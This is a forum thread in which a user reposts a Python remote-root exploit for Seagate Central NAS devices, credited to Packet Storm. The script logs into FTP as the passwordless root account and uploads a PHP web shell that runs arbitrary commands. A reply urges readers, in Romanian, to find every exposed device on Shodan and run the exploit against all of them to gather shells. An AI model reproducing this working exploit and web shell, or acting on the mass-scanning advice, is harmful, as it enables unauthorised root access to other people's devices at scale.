KhiZaRix Posted June 5, 2015 Report Posted June 5, 2015 #!/usr/bin/python# seagate_ftp_remote_root.py## Seagate Central Remote Root Exploit## Jeremy Brown [jbrown3264/gmail]# May 2015## -Synopsis-## Seagate Central by default has a passwordless root account (and no option to change it).# One way to exploit this is to log into it's ftp server and upload a php shell to the webroot.# From there, we can execute commands with root privileges as lighttpd is also running as root.## -Fixes-## Seagate scheduled it's updates to go live on April 28th, 2015.## Tested Firmware Version: 2014.0410.0026-F#import sysfrom ftplib import FTPport = 21php_shell = """<?phpif(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST["cmd"]); echo "<pre>$cmd</pre>"; system($cmd);}?>"""php_shell_filename = "shell.php"seagate_central_webroot = "/cirrus/"def main(): if(len(sys.argv) < 2): print("Usage: %s <host>" % sys.argv[0]) return host = sys.argv[1] try: with open(php_shell_filename, 'w') as file: file.write(php_shell) except Exception as error: print("Error: %s" % error); return try: ftp = FTP(host) ftp.login("root") ftp.storbinary("STOR " + seagate_central_webroot + php_shell_filename, open(php_shell_filename, 'rb')) ftp.close() except Exception as error: print("Error: %s" % error); return print("Now surf on over to http://%s%s%s for the php root shell" % (host, seagate_central_webroot, php_shell_filename)) returnif __name__ == "__main__": main()Sursa > https://dl.packetstormsecurity.net/1506-exploits/seagate_ftp_remote_root.py.txt Quote
socket Posted June 7, 2015 Report Posted June 7, 2015 Intra pe shodan.io scrie "Seagate Central" si incearca exploitul asta pe toate si ti-ai facut rost de shelluri. Quote